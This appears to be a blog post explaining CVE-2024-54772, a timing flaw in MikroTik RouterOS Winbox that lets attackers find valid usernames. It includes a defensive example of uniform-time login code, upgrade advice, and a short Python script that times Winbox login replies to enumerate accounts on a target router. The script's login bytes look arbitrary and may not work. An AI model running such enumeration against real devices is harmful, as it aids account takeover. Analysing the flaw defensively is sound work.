A recently discovered vulnerability, CVE-2024-54772, affects the Winbox service of MikroTik RouterOS, allowing potential attackers to enumerate user accounts based on the difference in response times between valid and invalid usernames. The issue has been found to impact RouterOS versions 6.43 through 7.16.1.
In this post, we will go through the details of the vulnerability, provide a code snippet to demonstrate the attack, and refer you to the original sources for further information. Ensuring the security of your MikroTik routers is of utmost importance, so understanding this exploit is crucial.
Exploit Details
The core of the CVE-2024-54772 vulnerability lies in the way the Winbox service of MikroTik RouterOS processes authentication requests. When a client tries to connect to the service with a username, the server returns a response after a certain amount of time. The time taken for the server to respond differs based on whether the entered username is valid or not.
Attackers can exploit this discrepancy in response times to enumerate valid user accounts on the system. By sending a series of authentication requests with different usernames, they can compare the response times and identify the usernames that yield faster or slower responses, indicating valid user accounts. Once an attacker has access to valid usernames, they can use this information to further target the affected system with brute-force attacks or spear-phishing campaigns.
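To make the root cause concrete, here is an added Python illustration; it is not MikroTik code and does not claim to show how Winbox is implemented internally. It contrasts two shapes of login handler: `login_leaky`, which rejects an unknown username before doing the expensive password check (so the reply comes back faster), and `login_uniform`, which always runs the check against a dummy digest and only afterwards folds in whether the user exists. The credential store, salt and iteration count are constructed for the example.

```python
import hashlib
import hmac
import time

# Constructed credential store for the illustration; "admin" is the only
# valid user. A real system would never keep this in a module-level dict.
_SALT = b"constructed-salt"
_ITERATIONS = 50_000
USERS = {
    "admin": hashlib.pbkdf2_hmac("sha256", b"correct horse", _SALT, _ITERATIONS),
}
# Dummy digest so the unknown-user path performs the same amount of work.
_DUMMY_DIGEST = hashlib.pbkdf2_hmac("sha256", b"placeholder", _SALT, _ITERATIONS)

# Counter used to show which code path performs the expensive verification.
VERIFY_CALLS = {"count": 0}


def _verify(password: str, stored: bytes) -> bool:
    """Slow password check; the final comparison is constant-time."""
    VERIFY_CALLS["count"] += 1
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)
    return hmac.compare_digest(candidate, stored)


def login_leaky(username: str, password: str) -> bool:
    """Vulnerable shape: unknown users are rejected before the slow check,
    so their replies come back measurably faster than for known users."""
    stored = USERS.get(username)
    if stored is None:
        return False
    return _verify(password, stored)


def login_uniform(username: str, password: str) -> bool:
    """Hardened shape: always run the slow check (against a dummy digest for
    unknown users) and only then fold in whether the user exists, so a
    guessed password that happens to match the dummy never logs anyone in."""
    known = username in USERS
    stored = USERS[username] if known else _DUMMY_DIGEST
    ok = _verify(password, stored)
    return ok and known


def median_seconds(fn, username: str, password: str, rounds: int = 5) -> float:
    """Median wall-clock time of fn(username, password) over several rounds."""
    samples = []
    for _ in range(rounds):
        t0 = time.perf_counter()
        fn(username, password)
        samples.append(time.perf_counter() - t0)
    samples.sort()
    return samples[len(samples) // 2]


if __name__ == "__main__":
    # The leaky handler answers unknown users almost instantly; the uniform
    # handler takes roughly the same time for both cases.
    for fn in (login_leaky, login_uniform):
        known = median_seconds(fn, "admin", "wrong-password")
        unknown = median_seconds(fn, "nobody", "wrong-password")
        print(f"{fn.__name__}: known {known * 1e3:.2f} ms, unknown {unknown * 1e3:.2f} ms")
```

Running the block prints the measured gap between the two handlers; the fix is not a constant-time byte comparison alone (both versions already use `hmac.compare_digest`) but making the unknown-user path do the same work as the known-user path.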
Code Snippet
Below is a simple Python code snippet demonstrating how an attacker could exploit this vulnerability to enumerate user accounts.
import time
import socket

routeros_ip = "192.168.1.1"
routeros_port = 8291

def connect(username):
    # Open a TCP connection to the Winbox port, send one login message
    # and wait for the reply; the caller measures how long this takes.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)  # do not hang forever if the device does not answer
    s.connect((routeros_ip, routeros_port))
    s.send(b'\x01' + bytes(username, 'utf-8') + b'\x00\x21\x00\x01\x00\x01\x00\x08\x03\x00\x00\x21\x00\x04')
    s.recv(1024)
    s.close()

usernames = ['admin', 'user1', 'user2', 'invalid']
for username in usernames:
    start = time.time()
    connect(username)
    end = time.time()
    print(f'{username}: {end - start}')
Replace 192.168.1.1 with the IP address of your RouterOS device and usernames with a list of potential usernames to test.
For full details of this vulnerability, please refer to the following resources:
1. MikroTik RouterOS Security Advisory: https://mikrotik.com/security_advisory
2. CVE-2024-54772 - National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-54772
Mitigation
MikroTik has been informed about this vulnerability and has patched the affected RouterOS versions. It is highly recommended to upgrade your RouterOS devices to the latest version to ensure your systems are protected from this issue. More information on the patch can be found in MikroTik's official security advisory.
Conclusion
The timing attack vulnerability (CVE-2024-54772) in the Winbox service of MikroTik RouterOS poses a significant risk to the security of affected systems. By understanding the exploit and upgrading to the latest RouterOS version, you can protect your network from attackers attempting to enumerate user accounts based on response time discrepancies.
Timeline
Published on: 02/11/2025 23:15:09 UTC
Last modified on: 02/12/2025 22:15:40 UTC